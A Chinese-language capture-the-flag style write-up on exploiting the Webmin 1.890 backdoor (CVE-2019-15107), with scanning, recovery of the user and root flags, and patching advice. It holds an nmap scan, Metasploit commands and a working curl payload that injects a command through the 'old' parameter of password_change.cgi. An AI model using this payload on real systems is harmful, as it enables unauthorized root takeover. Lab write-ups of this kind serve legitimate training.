研究目标:对 Webmin 1.890 版本(CVE-2019-15107)中的远程代码执行(RCE)漏洞进行全面分析并成功利用,最终完全控制目标系统。
研究目标: 对Webmin 1.890版本中的一个远程代码执行(RCE)漏洞(CVE-2019-15107)进行全面的分析和成功利用,最终完全控制目标系统。
方法论:
初始侦察:
使用Nmap进行网络扫描:
nmap -sV -sC -A -p- 10.201.105.185
发现运行在端口10000上的Webmin 1.890服务
漏洞分析:
研究了password_change.cgi中的漏洞机制
确认了未经认证的任意命令执行的可能性
利用:
实现了两种攻击向量:
使用Metasploit框架:
use exploit/linux/http/webmin_backdoor
set RHOSTS 10.201.105.185
set LHOST tun0
exploit
通过curl手动利用:
curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test"
后渗透:
获取了交互式root shell
进行了文件系统分析
发现flag文件:
/home/dark/user.txt
/root/root.txt
发现:
成功利用了CVE-2019-15107漏洞
获得了系统的完全root权限
展示了及时软件更新的关键重要性
技术结论:
漏洞允许通过"old"参数注入执行任意命令
缺乏身份验证检查使得这一点特别危险
1.890版本包含一个在后来的版本中修补的后门
安全建议:
立即升级到当前Webmin版本
通过IP限制管理面板的访问
定期对Web应用程序进行安全审计
进一步研究方向:
分析其他Webmin漏洞
开发不使用Metasploit的自定义利用
研究被攻陷系统中的持久化技术
本案例研究展示了及时系统更新的关键重要性以及在部署的软件中持续漏洞监控的必要性。该研究提供了现代Web应用程序利用技术的实用见解,同时强调了基本的安全原则。